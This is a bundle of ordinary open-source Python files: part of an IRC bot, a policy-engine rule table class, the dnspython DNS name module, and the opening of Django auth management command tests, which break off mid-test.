except requests.exceptions.InvalidSchema:
log.error("Invalid schema in URI: %s" % url)
return None
except requests.exceptions.ConnectionError:
log.error("Connection error when connecting to %s" % url)
return None
size = int(r.headers.get('Content-Length', 0)) // 1024
#log.debug("Content-Length: %dkB" % size)
if size > 2048:
log.warn("Content too large, will not fetch: %skB %s" % (size, url))
return None
return r
def getNick(self, user):
"""Parses nick from nick!user@host
@type user: string
@param user: nick!user@host
@return: nick"""
return user.split('!', 1)[0]
def isAdmin(self, user):
"""Check if an user has admin privileges.
@return: True or False"""
for pattern in self.config['admins']:
if fnmatch.fnmatch(user, pattern):
return True
return False
def to_utf8(self, _string):
"""Convert string to UTF-8 if it is unicode"""
if isinstance(_string, unicode):
_string = _string.encode("UTF-8")
return _string
def to_unicode(self, _string):
"""Convert string to UTF-8 if it is unicode"""
if not isinstance(_string, unicode):
try:
_string = unicode(_string)
except:
try:
_string = _string.decode('utf-8')
except:
_string = _string.decode('iso-8859-1')
return _string
def reload_config(self):
"""Reload config-file while bot is running (on rehash)"""
log = logging.getLogger('reload_config')
config = read_config()
if not config:
return
valid_config = validate_config(config)
if not valid_config:
log.info('Invalid config file!')
return
log.info('Valid config file found, reloading...')
# ignore nick and networks, as we don't want rehash to change these values
ignored = ['nick', 'networks']
# make a deep copy of old config, so we don't remove values from it
old_config = deepcopy(self.config)
# remove ignored values to make comparing/updating easier and safer
for k in ignored:
old_config.pop(k, {})
config.pop(k, {})
# Get diff between configs
dd = DictDiffer(config, old_config)
for k in dd.added():
log.info('%s added (%s: %s)' % (k, k, config[k]))
self.config[k] = config[k]
for k in dd.removed():
log.info('%s removed (%s: %s)' % (k, k, old_config[k]))
del self.config[k]
for k in dd.changed():
log.info('%s changed' % k)
# compare configs
d = DictDiffer(config[k], old_config[k])
# add all changes to a big list
changes = list(d.added())
changes.extend(list(d.removed()))
changes.extend(list(d.changed()))
# loop through changes and log them individually
for x in changes:
log.info('%s[\'%s\']: \'%s\' -> \'%s\'' % (k, x, old_config[k].get(x, {}), config[k].get(x, {})))
# replace the whole object
self.config[k] = config[k]
# change logging level, default to INFO
log_level = config.get('logging', {}).get('debug', False)
if log_level:
logging.root.setLevel(logging.DEBUG)
else:
logging.root.setLevel(logging.INFO)
def init_logging(config):
logger = logging.getLogger()
if config.get('debug', False):
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
if USE_COLOR:
FORMAT = "[%(asctime)-15s][%(levelname)-20s][$BOLD%(name)-15s$RESET] %(message)s"
# Append file name + number if debug is enabled
if config.get('debug', False):
FORMAT = "%s %s" % (FORMAT, " ($BOLD%(filename)s$RESET:%(lineno)d)")
COLOR_FORMAT = colorlogger.formatter_message(FORMAT, True)
formatter = colorlogger.ColoredFormatter(COLOR_FORMAT)
else:
FORMAT = "%(asctime)-15s %(levelname)-8s %(name)-11s %(message)s"
formatter = logging.Formatter(FORMAT)
# Append file name + number if debug is enabled
if config.get('debug', False):
FORMAT = "%s %s" % (FORMAT, " (%(filename)s:%(lineno)d)")
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logger.addHandler(handler)
def read_config():
config_file = sys.argv[1] if len(sys.argv) > 1 else os.path.join(sys.path[0], "config.yml")
if os.path.exists(config_file):
config = yaml.load(file(config_file))
else:
print("No config file found, please edit example.yml and rename it to config.yml")
return
return config
def validate_config(config):
schema = json.load(file(os.path.join(sys.path[0], "config_schema.json")))
log.info("Validating configuration")
v = jsonschema.Draft3Validator(schema)
if not v.is_valid(config):
log.error("Error(s) in configuration:")
for error in sorted(v.iter_errors(config), key=str):
log.error(error)
return False
log.info("Config ok")
return True
def main():
sys.path.append(os.path.join(sys.path[0], 'lib'))
config = read_config()
# if config not found or can't validate it, exit with error
if not config or not validate_config(config):
sys.exit(1)
init_logging(config.get('logging', {}))
factory = PyFiBotFactory(config)
for network, settings in config['networks'].items():
# settings = per network, config = global
nick = settings.get('nick', None) or config['nick']
linerate = settings.get('linerate', None) or config.get('linerate', None)
password = settings.get('password', None)
is_ssl = bool(settings.get('is_ssl', False))
port = int(settings.get('port', 6667))
# normalize channel names to prevent internal confusion
chanlist = []
for channel in settings['channels']:
if channel[0] not in '&#!+':
channel = '#' + channel
chanlist.append(channel)
server_name = settings['server']
factory.createNetwork((server_name, port), network, nick, chanlist, linerate, password, is_ssl)
if is_ssl:
log.info("connecting via SSL to %s:%d" % (server_name, port))
reactor.connectSSL(server_name, port, factory, ssl.ClientContextFactory())
else:
log.info("connecting to %s:%d" % (server_name, port))
reactor.connectTCP(server_name, port, factory)
reactor.run()
if __name__ == '__main__':
main()
|
|
import os
import sys
import time
import exceptions
import copy
import logging
from threading import Thread, Lock
import uuid
try:
import cPickle as pickle
except:
import pickle
'''
@author: msune,lbergesio,omoya,cbermudo,CarolinaFernandez
@organization: i2CAT, OFELIA FP7
PolicyEngine RuleTable class
Encapsulates logic of a simple Rule Table
'''
from monscale.pypelib.resolver.Resolver import Resolver
from monscale.pypelib.Rule import Rule,TerminalMatch
from monscale.pypelib.parsing.ParseEngine import ParseEngine
from monscale.pypelib.persistence.PersistenceEngine import PersistenceEngine
from monscale.pypelib.utils.Logger import Logger
from monscale.pypelib.utils.Exceptions import *
class RuleEntry():
rule = None
enabled = True
def __init__(self,rule, enabled=True):
self.rule = rule
self.enabled = enabled
class RuleTable():
logger = Logger.getLogger()
uuid=None
name=None
_persist = None
_parser = None
_persistenceBackend = None
_persistenceBackendParameters=None
#Default table policy
_policy = None
_ruleSet = None
_mappings = None
_mutex = None
_resolver = None
#Constructor
def __init__(self,name,resolverMappings,defaultParser, defaultPersistence, defaultPersistenceFlag, pType = False, uuid = None,**kwargs):
if not isinstance(pType,bool):
raise Exception("Unknown default table policy")
self.uuid = uuid
self.name = name
self._mutex = Lock()
self._policy = pType
self._parser = defaultParser
self._persistenceBackend = defaultPersistence
self._persist = defaultPersistenceFlag
self._mappings = resolverMappings
self._ruleSet = list()
self._persistenceBackendParameters = kwargs
if self._persist:
self.save(self._persistenceBackend,**kwargs)
#Generate the resolver
self._resolver = Resolver(resolverMappings)
#Deep copy
def clone(self):
#XXX: in principle mutex is not needed since methods calling clone() are already protected
#with self._mutex:
cpTable = RuleTable(self.name,None,self._parser,self._persistenceBackend, False,self._policy,self.uuid, **self._persistenceBackendParameters)
cpTable._mutex = None
cpTable._persist = copy.deepcopy(self._persist)
cpTable._ruleSet = copy.deepcopy(self._ruleSet)
cpTable._resolver = None
return cpTable
#Determine rule position
def _getRuleIndex(self, rule):
for it in self._ruleSet:
if it.rule == rule:
return self._ruleSet.index(it)
return None
def getRule(self, index):
return self._ruleSet[index].rule
#Add, move and remove rule
def addRule(self,string,enabled=True,pos=None,parser=None,pBackend=None,persist=True):
if not parser:
parser = self._parser
rule = ParseEngine.parseRule(string, parser)
rule.setUUID(uuid.uuid4().hex)
with self._mutex:
if pos > len(self._ruleSet):
#raise Exception("Invalid position")
self._ruleSet.append(RuleEntry(rule,enabled))
elif pos !=None:
self._ruleSet.insert(pos,RuleEntry(rule,enabled))
else:
self._ruleSet.append(RuleEntry(rule,enabled))
if self._persist:
self.save()
def removeRule(self,rule=None, index=None):
if (not rule) and (index == None):
raise Exception("Unable to determine which rule to remove; you must specify either the rule or the index")
with self._mutex:
if index == None:
index = self._getRuleIndex(rule)
if index == None:
raise Exception("Unable to find rule in the ruleSet")
self._ruleSet.pop(index)
if self._persist:
self.save()
def moveRule(self, newIndex, rule=None, index=None):
if (not rule) and (index == None):
raise Exception("Unable to determine which rule to move; you must specify either the rule or the index")
with self._mutex:
if index == None:
index = self._getRuleIndex(rule)
if index == None:
raise Exception("Unable to find rule in the ruleSet")
self._ruleSet.insert(newIndex, self._ruleSet.pop(index))
if self._persist:
self.save()
def _modEnableRule(self, enable, rule=None,index=None):
if (not rule) and (index == None):
raise Exception("Unable to determine which rule to enable; you must specify either the rule or the index")
with self._mutex:
if index == None:
index = self._getRuleIndex(rule)
if index == None:
raise Exception("Unable to find rule in the ruleSet")
self._ruleSet[index].enabled = enable
if self._persist:
self.save()
def enableRule(self, rule=None, index=None):
return self._modEnableRule(True,rule,index)
def disableRule(self, rule=None, index= None):
return self._modEnableRule(False,rule,index)
def setPolicy(self, policy):
if not isinstance(policy,bool):
raise Exception("Unknown default table policy")
with self._mutex:
self._policy = policy
if self._persist:
self.save()
def setParser(self, parser):
with self._mutex:
self._parser = parser
if self._persist:
self.save()
def setPersistenceBackend(self, persistenceBackend):
with self._mutex:
self._persistenceBackend = persistenceBackend
if self._persist:
self.save()
def setPersistenceFlag(self, persistenceFlag):
with self._mutex:
self._persist = persistenceFlag
if self._persist:
self.save()
def setMappings(self, mappings):
with self._mutex:
self._mappings = mappings
if self._persist:
self.save()
def dump(self):
print "Table: "+self.name+" UUID: "+str(self.uuid)
print "NUmber of rules: "+str(len(self._ruleSet))
with self._mutex:
i=0
for it in self._ruleSet:
print "[%s]:"%i +it.rule.dump()+ " Enabled: "+str(it.enabled)
i+=1
print "Default policy: "+str(self._policy)
#Go through the table
def evaluate(self,metaObj):
#Iterate over ruleset
with self._mutex:
for it in self._ruleSet:
if it.enabled:
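# A rule whose action is terminal raises TerminalMatch: value True means the
# table accepts and evaluation stops; value False is re-raised as an explicit deny.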
try:
it.rule.evaluate(metaObj,self._resolver)
except TerminalMatch as terminal:
if terminal.value:
return True
else:
raise terminal
if self._policy:
return self._policy
else:
raise Exception("Policy verification failed. Policy type is DENY")
def save(self, pBackend=None,**kwargs):
if not pBackend:
pBackend = self._persistenceBackend
if not kwargs:
kwargs2 = self._persistenceBackendParameters
else:
kwargs2 = kwargs
PersistenceEngine.save(self,pBackend,**kwargs2)
#In general should not be called, use loadOrGenerate instead
@staticmethod
def load(name, resolverMappings, pBackend, **kwargs):
return PersistenceEngine.load(name,pBackend,resolverMappings,**kwargs)
@staticmethod
def loadOrGenerate(name,resolverMappings,defaultParser, defaultPersistence, defaultPersistenceFlag, pType=False, uuid=None,**kwargs):
try:
return PersistenceEngine.load(name,defaultPersistence, resolverMappings, defaultParser,**kwargs)
except ZeroPolicyObjectsReturned:
RuleTable.logger.warning("Unable to load RuleTable, generating a new one")
return RuleTable(name,resolverMappings,defaultParser, defaultPersistence, defaultPersistenceFlag, pType, uuid,**kwargs)
except MultiplePolicyObjectsReturned:
RuleTable.logger.warning("Unable to load a single RuleTable, asking the user")
raise MultiplePolicyObjectsReturned
except Exception as e:
RuleTable.logger.error("Unable to load RuleTable. Exception: %s" % str(e))
'''
Retrieves every Engine's PolicyRuleTable object for a given name.
This method should be seldom used.
'''
@staticmethod
def loadAll(name, defaultPersistence):
return PersistenceEngine.loadAll(name, defaultPersistence)
'''
Deletes an Engine's PolicyRuleTable object for a given ID.
This method should be seldom used.
'''
@staticmethod
def delete(tableID, defaultPersistence):
return PersistenceEngine.delete(tableID, defaultPersistence)
#Getters
def getRuleSet(self):
return self._ruleSet
def getName(self):
return self.name
def getPolicyType(self):
return self._policy
def getPersistence(self):
return self._persistenceBackend
def getParser(self):
return self._parser
def getResolverMappings(self):
return self._mappings
def getPersistenceFlag(self):
return self._persist
|
|
# Copyright (C) 2001-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""DNS Names.
@var root: The DNS root name.
@type root: dns.name.Name object
@var empty: The empty DNS name.
@type empty: dns.name.Name object
"""
import cStringIO
import struct
import sys
import copy
if sys.hexversion >= 0x02030000:
import encodings.idna
import dns.exception
import dns.wiredata
NAMERELN_NONE = 0
NAMERELN_SUPERDOMAIN = 1
NAMERELN_SUBDOMAIN = 2
NAMERELN_EQUAL = 3
NAMERELN_COMMONANCESTOR = 4
class EmptyLabel(dns.exception.SyntaxError):
"""Raised if a label is empty."""
pass
class BadEscape(dns.exception.SyntaxError):
"""Raised if an escaped code in a text format name is invalid."""
pass
class BadPointer(dns.exception.FormError):
"""Raised if a compression pointer points forward instead of backward."""
pass
class BadLabelType(dns.exception.FormError):
"""Raised if the label type of a wire format name is unknown."""
pass
class NeedAbsoluteNameOrOrigin(dns.exception.DNSException):
"""Raised if an attempt is made to convert a non-absolute name to
wire when there is also a non-absolute (or missing) origin."""
pass
class NameTooLong(dns.exception.FormError):
"""Raised if a name is > 255 octets long."""
pass
class LabelTooLong(dns.exception.SyntaxError):
"""Raised if a label is > 63 octets long."""
pass
class AbsoluteConcatenation(dns.exception.DNSException):
"""Raised if an attempt is made to append anything other than the
empty name to an absolute name."""
pass
class NoParent(dns.exception.DNSException):
"""Raised if an attempt is made to get the parent of the root name
or the empty name."""
pass
_escaped = {
'"' : True,
'(' : True,
')' : True,
'.' : True,
';' : True,
'\\' : True,
'@' : True,
'$' : True
}
def _escapify(label, unicode_mode=False):
"""Escape the characters in label which need it.
@param unicode_mode: escapify only special and whitespace (<= 0x20)
characters
@returns: the escaped string
@rtype: string"""
text = ''
for c in label:
if c in _escaped:
text += '\\' + c
elif ord(c) > 0x20 and ord(c) < 0x7F:
text += c
else:
if unicode_mode and ord(c) >= 0x7F:
text += c
else:
text += '\\%03d' % ord(c)
return text
def _validate_labels(labels):
"""Check for empty labels in the middle of a label sequence,
labels that are too long, and for too many labels.
@raises NameTooLong: the name as a whole is too long
@raises LabelTooLong: an individual label is too long
@raises EmptyLabel: a label is empty (i.e. the root label) and appears
in a position other than the end of the label sequence"""
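# Limits from RFC 1035: at most 63 octets per label and 255 octets for the whole
# encoded name; each label contributes len(label) + 1 (its length octet) to the total.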
l = len(labels)
total = 0
i = -1
j = 0
for label in labels:
ll = len(label)
total += ll + 1
if ll > 63:
raise LabelTooLong
if i < 0 and label == '':
i = j
j += 1
if total > 255:
raise NameTooLong
if i >= 0 and i != l - 1:
raise EmptyLabel
class Name(object):
"""A DNS name.
The dns.name.Name class represents a DNS name as a tuple of labels.
Instances of the class are immutable.
@ivar labels: The tuple of labels in the name. Each label is a string of
up to 63 octets."""
__slots__ = ['labels']
def __init__(self, labels):
"""Initialize a domain name from a list of labels.
@param labels: the labels
@type labels: any iterable whose values are strings
"""
super(Name, self).__setattr__('labels', tuple(labels))
_validate_labels(self.labels)
def __setattr__(self, name, value):
raise TypeError("object doesn't support attribute assignment")
def __copy__(self):
return Name(self.labels)
def __deepcopy__(self, memo):
return Name(copy.deepcopy(self.labels, memo))
def is_absolute(self):
"""Is the most significant label of this name the root label?
@rtype: bool
"""
return len(self.labels) > 0 and self.labels[-1] == ''
def is_wild(self):
"""Is this name wild? (I.e. Is the least significant label '*'?)
@rtype: bool
"""
return len(self.labels) > 0 and self.labels[0] == '*'
def __hash__(self):
"""Return a case-insensitive hash of the name.
@rtype: int
"""
h = 0L
for label in self.labels:
for c in label:
h += ( h << 3 ) + ord(c.lower())
return int(h % sys.maxint)
def fullcompare(self, other):
"""Compare two names, returning a 3-tuple (relation, order, nlabels).
I{relation} describes the relationship between the names,
and is one of: dns.name.NAMERELN_NONE,
dns.name.NAMERELN_SUPERDOMAIN, dns.name.NAMERELN_SUBDOMAIN,
dns.name.NAMERELN_EQUAL, or dns.name.NAMERELN_COMMONANCESTOR
I{order} is < 0 if self < other, > 0 if self > other, and ==
0 if self == other. A relative name is always less than an
absolute name. If both names have the same relativity, then
the DNSSEC order relation is used to order them.
I{nlabels} is the number of significant labels that the two names
have in common.
"""
sabs = self.is_absolute()
oabs = other.is_absolute()
if sabs != oabs:
if sabs:
return (NAMERELN_NONE, 1, 0)
else:
return (NAMERELN_NONE, -1, 0)
l1 = len(self.labels)
l2 = len(other.labels)
ldiff = l1 - l2
if ldiff < 0:
l = l1
else:
l = l2
order = 0
nlabels = 0
namereln = NAMERELN_NONE
while l > 0:
l -= 1
l1 -= 1
l2 -= 1
label1 = self.labels[l1].lower()
label2 = other.labels[l2].lower()
if label1 < label2:
order = -1
if nlabels > 0:
namereln = NAMERELN_COMMONANCESTOR
return (namereln, order, nlabels)
elif label1 > label2:
order = 1
if nlabels > 0:
namereln = NAMERELN_COMMONANCESTOR
return (namereln, order, nlabels)
nlabels += 1
order = ldiff
if ldiff < 0:
namereln = NAMERELN_SUPERDOMAIN
elif ldiff > 0:
namereln = NAMERELN_SUBDOMAIN
else:
namereln = NAMERELN_EQUAL
return (namereln, order, nlabels)
def is_subdomain(self, other):
"""Is self a subdomain of other?
The notion of subdomain includes equality.
@rtype: bool
"""
(nr, o, nl) = self.fullcompare(other)
if nr == NAMERELN_SUBDOMAIN or nr == NAMERELN_EQUAL:
return True
return False
def is_superdomain(self, other):
"""Is self a superdomain of other?
The notion of superdomain includes equality.
@rtype: bool
"""
(nr, o, nl) = self.fullcompare(other)
if nr == NAMERELN_SUPERDOMAIN or nr == NAMERELN_EQUAL:
return True
return False
def canonicalize(self):
"""Return a name which is equal to the current name, but is in
DNSSEC canonical form.
@rtype: dns.name.Name object
"""
return Name([x.lower() for x in self.labels])
def __eq__(self, other):
if isinstance(other, Name):
return self.fullcompare(other)[1] == 0
else:
return False
def __ne__(self, other):
if isinstance(other, Name):
return self.fullcompare(other)[1] != 0
else:
return True
def __lt__(self, other):
if isinstance(other, Name):
return self.fullcompare(other)[1] < 0
else:
return NotImplemented
def __le__(self, other):
if isinstance(other, Name):
return self.fullcompare(other)[1] <= 0
else:
return NotImplemented
def __ge__(self, other):
if isinstance(other, Name):
return self.fullcompare(other)[1] >= 0
else:
return NotImplemented
def __gt__(self, other):
if isinstance(other, Name):
return self.fullcompare(other)[1] > 0
else:
return NotImplemented
def __repr__(self):
return '<DNS name ' + self.__str__() + '>'
def __str__(self):
return self.to_text(False)
def to_text(self, omit_final_dot = False):
"""Convert name to text format.
@param omit_final_dot: If True, don't emit the final dot (denoting the
root label) for absolute names. The default is False.
@rtype: string
"""
if len(self.labels) == 0:
return '@'
if len(self.labels) == 1 and self.labels[0] == '':
return '.'
if omit_final_dot and self.is_absolute():
l = self.labels[:-1]
else:
l = self.labels
s = '.'.join(map(_escapify, l))
return s
def to_unicode(self, omit_final_dot = False):
"""Convert name to Unicode text format.
IDN ACE labels are converted to Unicode.
@param omit_final_dot: If True, don't emit the final dot (denoting the
root label) for absolute names. The default is False.
@rtype: string
"""
if len(self.labels) == 0:
return u'@'
if len(self.labels) == 1 and self.labels[0] == '':
return u'.'
if omit_final_dot and self.is_absolute():
l = self.labels[:-1]
else:
l = self.labels
s = u'.'.join([_escapify(encodings.idna.ToUnicode(x), True) for x in l])
return s
def to_digestable(self, origin=None):
"""Convert name to a format suitable for digesting in hashes.
The name is canonicalized and converted to uncompressed wire format.
@param origin: If the name is relative and origin is not None, then
origin will be appended to it.
@type origin: dns.name.Name object
@raises NeedAbsoluteNameOrOrigin: All names in wire format are
absolute. If self is a relative name, then an origin must be supplied;
if it is missing, then this exception is raised
@rtype: string
"""
if not self.is_absolute():
if origin is None or not origin.is_absolute():
raise NeedAbsoluteNameOrOrigin
labels = list(self.labels)
labels.extend(list(origin.labels))
else:
labels = self.labels
dlabels = ["%s%s" % (chr(len(x)), x.lower()) for x in labels]
return ''.join(dlabels)
def to_wire(self, file = None, compress = None, origin = None):
"""Convert name to wire format, possibly compressing it.
@param file: the file where the name is emitted (typically
a cStringIO file). If None, a string containing the wire name
will be returned.
@type file: file or None
@param compress: The compression table. If None (the default) names
will not be compressed.
@type compress: dict
@param origin: If the name is relative and origin is not None, then
origin will be appended to it.
@type origin: dns.name.Name object
@raises NeedAbsoluteNameOrOrigin: All names in wire format are
absolute. If self is a relative name, then an origin must be supplied;
if it is missing, then this exception is raised
"""
if file is None:
file = cStringIO.StringIO()
want_return = True
else:
want_return = False
if not self.is_absolute():
if origin is None or not origin.is_absolute():
raise NeedAbsoluteNameOrOrigin
labels = list(self.labels)
labels.extend(list(origin.labels))
else:
labels = self.labels
i = 0
for label in labels:
n = Name(labels[i:])
i += 1
if not compress is None:
pos = compress.get(n)
else:
pos = None
if not pos is None:
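# Emit a two-byte compression pointer: the top two bits set (0xC000) plus
# the 14-bit offset at which this suffix was previously written.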
value = 0xc000 + pos
s = struct.pack('!H', value)
file.write(s)
break
else:
if not compress is None and len(n) > 1:
pos = file.tell()
if pos <= 0x3fff:
compress[n] = pos
l = len(label)
file.write(chr(l))
if l > 0:
file.write(label)
if want_return:
return file.getvalue()
def __len__(self):
"""The length of the name (in labels).
@rtype: int
"""
return len(self.labels)
def __getitem__(self, index):
return self.labels[index]
def __getslice__(self, start, stop):
return self.labels[start:stop]
def __add__(self, other):
return self.concatenate(other)
def __sub__(self, other):
return self.relativize(other)
def split(self, depth):
"""Split a name into a prefix and suffix at depth.
@param depth: the number of labels in the suffix
@type depth: int
@raises ValueError: the depth was not >= 0 and <= the length of the
name.
@returns: the tuple (prefix, suffix)
@rtype: tuple
"""
l = len(self.labels)
if depth == 0:
return (self, dns.name.empty)
elif depth == l:
return (dns.name.empty, self)
elif depth < 0 or depth > l:
raise ValueError('depth must be >= 0 and <= the length of the name')
return (Name(self[: -depth]), Name(self[-depth :]))
def concatenate(self, other):
"""Return a new name which is the concatenation of self and other.
@rtype: dns.name.Name object
@raises AbsoluteConcatenation: self is absolute and other is
not the empty name
"""
if self.is_absolute() and len(other) > 0:
raise AbsoluteConcatenation
labels = list(self.labels)
labels.extend(list(other.labels))
return Name(labels)
def relativize(self, origin):
"""If self is a subdomain of origin, return a new name which is self
relative to origin. Otherwise return self.
@rtype: dns.name.Name object
"""
if not origin is None and self.is_subdomain(origin):
return Name(self[: -len(origin)])
else:
return self
def derelativize(self, origin):
"""If self is a relative name, return a new name which is the
concatenation of self and origin. Otherwise return self.
@rtype: dns.name.Name object
"""
if not self.is_absolute():
return self.concatenate(origin)
else:
return self
def choose_relativity(self, origin=None, relativize=True):
"""Return a name with the relativity desired by the caller. If
origin is None, then self is returned. Otherwise, if
relativize is true the name is relativized, and if relativize is
false the name is derelativized.
@rtype: dns.name.Name object
"""
if origin:
if relativize:
return self.relativize(origin)
else:
return self.derelativize(origin)
else:
return self
def parent(self):
"""Return the parent of the name.
@rtype: dns.name.Name object
@raises NoParent: the name is either the root name or the empty name,
and thus has no parent.
"""
if self == root or self == empty:
raise NoParent
return Name(self.labels[1:])
root = Name([''])
empty = Name([])
def from_unicode(text, origin = root):
"""Convert unicode text into a Name object.
Labels are encoded in IDN ACE form.
@rtype: dns.name.Name object
"""
if not isinstance(text, unicode):
raise ValueError("input to from_unicode() must be a unicode string")
if not (origin is None or isinstance(origin, Name)):
raise ValueError("origin must be a Name or None")
labels = []
label = u''
escaping = False
edigits = 0
total = 0
if text == u'@':
text = u''
if text:
if text == u'.':
return Name(['']) # no Unicode "u" on this constant!
for c in text:
if escaping:
if edigits == 0:
if c.isdigit():
total = int(c)
edigits += 1
else:
label += c
escaping = False
else:
if not c.isdigit():
raise BadEscape
total *= 10
total += int(c)
edigits += 1
if edigits == 3:
escaping = False
label += chr(total)
elif c == u'.' or c == u'\u3002' or \
c == u'\uff0e' or c == u'\uff61':
if len(label) == 0:
raise EmptyLabel
labels.append(encodings.idna.ToASCII(label))
label = u''
elif c == u'\\':
escaping = True
edigits = 0
total = 0
else:
label += c
if escaping:
raise BadEscape
if len(label) > 0:
labels.append(encodings.idna.ToASCII(label))
else:
labels.append('')
if (len(labels) == 0 or labels[-1] != '') and not origin is None:
labels.extend(list(origin.labels))
return Name(labels)
def from_text(text, origin = root):
"""Convert text into a Name object.
@rtype: dns.name.Name object
"""
if not isinstance(text, str):
if isinstance(text, unicode) and sys.hexversion >= 0x02030000:
return from_unicode(text, origin)
else:
raise ValueError("input to from_text() must be a string")
if not (origin is None or isinstance(origin, Name)):
raise ValueError("origin must be a Name or None")
labels = []
label = ''
escaping = False
edigits = 0
total = 0
if text == '@':
text = ''
if text:
if text == '.':
return Name([''])
for c in text:
if escaping:
if edigits == 0:
if c.isdigit():
total = int(c)
edigits += 1
else:
label += c
escaping = False
else:
if not c.isdigit():
raise BadEscape
total *= 10
total += int(c)
edigits += 1
if edigits == 3:
escaping = False
label += chr(total)
elif c == '.':
if len(label) == 0:
raise EmptyLabel
labels.append(label)
label = ''
elif c == '\\':
escaping = True
edigits = 0
total = 0
else:
label += c
if escaping:
raise BadEscape
if len(label) > 0:
labels.append(label)
else:
labels.append('')
if (len(labels) == 0 or labels[-1] != '') and not origin is None:
labels.extend(list(origin.labels))
return Name(labels)
def from_wire(message, current):
"""Convert possibly compressed wire format into a Name.
@param message: the entire DNS message
@type message: string
@param current: the offset of the beginning of the name from the start
of the message
@type current: int
@raises dns.name.BadPointer: a compression pointer did not point backwards
in the message
@raises dns.name.BadLabelType: an invalid label type was encountered.
@returns: a tuple consisting of the name that was read and the number
of bytes of the wire format message which were consumed reading it
@rtype: (dns.name.Name object, int) tuple
"""
if not isinstance(message, str):
raise ValueError("input to from_wire() must be a byte string")
message = dns.wiredata.maybe_wrap(message)
labels = []
biggest_pointer = current
hops = 0
count = ord(message[current])
current += 1
cused = 1
while count != 0:
if count < 64:
labels.append(message[current : current + count].unwrap())
current += count
if hops == 0:
cused += count
elif count >= 192:
current = (count & 0x3f) * 256 + ord(message[current])
if hops == 0:
cused += 1
if current >= biggest_pointer:
raise BadPointer
biggest_pointer = current
hops += 1
else:
raise BadLabelType
count = ord(message[current])
current += 1
if hops == 0:
cused += 1
labels.append('')
return (Name(labels), cused)
|
|
import builtins
import sys
from datetime import date
from io import StringIO
from unittest import mock
from django.apps import apps
from django.contrib.auth import management
from django.contrib.auth.management import create_permissions
from django.contrib.auth.management.commands import (
changepassword, createsuperuser,
)
from django.contrib.auth.models import Group, Permission, User
from django.contrib.contenttypes.models import ContentType
from django.core.management import call_command
from django.core.management.base import CommandError
from django.db import migrations
from django.test import TestCase, override_settings
from django.utils.translation import ugettext_lazy as _
from .models import (
CustomUser, CustomUserNonUniqueUsername, CustomUserWithFK, Email,
)
def mock_inputs(inputs):
"""
Decorator to temporarily replace input/getpass to allow interactive
createsuperuser.
"""
def inner(test_func):
def wrapped(*args):
class mock_getpass:
@staticmethod
def getpass(prompt=b'Password: ', stream=None):
if callable(inputs['password']):
return inputs['password']()
return inputs['password']
def mock_input(prompt):
assert '__proxy__' not in prompt
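# Guard against a lazy translation proxy leaking into the prompt text;
# prompts must already be plain strings before they reach input().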
response = ''
for key, val in inputs.items():
if key in prompt.lower():
response = val
break
return response
old_getpass = createsuperuser.getpass
old_input = builtins.input
createsuperuser.getpass = mock_getpass
builtins.input = mock_input
try:
test_func(*args)
finally:
createsuperuser.getpass = old_getpass
builtins.input = old_input
return wrapped
return inner
class MockTTY:
"""
A fake stdin object that pretends to be a TTY to be used in conjunction
with mock_inputs.
"""
def isatty(self):
return True
class GetDefaultUsernameTestCase(TestCase):
def setUp(self):
self.old_get_system_username = management.get_system_username
def tearDown(self):
management.get_system_username = self.old_get_system_username
def test_actual_implementation(self):
self.assertIsInstance(management.get_system_username(), str)
def test_simple(self):
management.get_system_username = lambda: 'joe'
self.assertEqual(management.get_default_username(), 'joe')
def test_existing(self):
User.objects.create(username='joe')
management.get_system_username = lambda: 'joe'
self.assertEqual(management.get_default_username(), '')
self.assertEqual(
management.get_default_username(check_db=False), 'joe')
def test_i18n(self):
# 'Julia' with accented 'u':
management.get_system_username = lambda: 'J\xfalia'
self.assertEqual(management.get_default_username(), 'julia')
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator'},
])
class ChangepasswordManagementCommandTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='joe', password='qwerty')
self.stdout = StringIO()
self.stderr = StringIO()
def tearDown(self):
self.stdout.close()
self.stderr.close()
@mock.patch.object(changepassword.Command, '_get_pass', return_value='not qwerty')
def test_that_changepassword_command_changes_joes_password(self, mock_get_pass):
"Executing the changepassword management command should change joe's password"
self.assertTrue(self.user.check_password('qwerty'))
call_command('changepassword', username='joe', stdout=self.stdout)
command_output = self.stdout.getvalue().strip()
self.assertEqual(
command_output,
"Changing password for user 'joe'\nPassword changed successfully for user 'joe'"
)
self.assertTrue(User.objects.get(username="joe").check_password("not qwerty"))
@mock.patch.object(changepassword.Command, '_get_pass', side_effect=lambda *args: str(args))
def test_that_max_tries_exits_1(self, mock_get_pass):
"""
A CommandError should be thrown by handle() if the user enters in
mismatched passwords three times.
"""
with self.assertRaises(CommandError):
call_command('changepassword', username='joe', stdout=self.stdout, stderr=self.stderr)
@mock.patch.object(changepassword.Command, '_get_pass', return_value='1234567890')
def test_password_validation(self, mock_get_pass):
"""
A CommandError should be raised if the user enters in passwords which
fail validation three times.
"""
abort_msg = "Aborting password change for user 'joe' after 3 attempts"
with self.assertRaisesMessage(CommandError, abort_msg):
call_command('changepassword', username='joe', stdout=self.stdout, stderr=self.stderr)
self.assertIn('This password is entirely numeric.', self.stderr.getvalue())
@mock.patch.object(changepassword.Command, '_get_pass', return_value='not qwerty')
def test_that_changepassword_command_works_with_nonascii_output(self, mock_get_pass):
"""
#21627 -- Executing the changepassword management command should allow
non-ASCII characters from the User object representation.
"""
# 'Julia' with accented 'u':
User.objects.create_user(username='J\xfalia', password='qwerty')
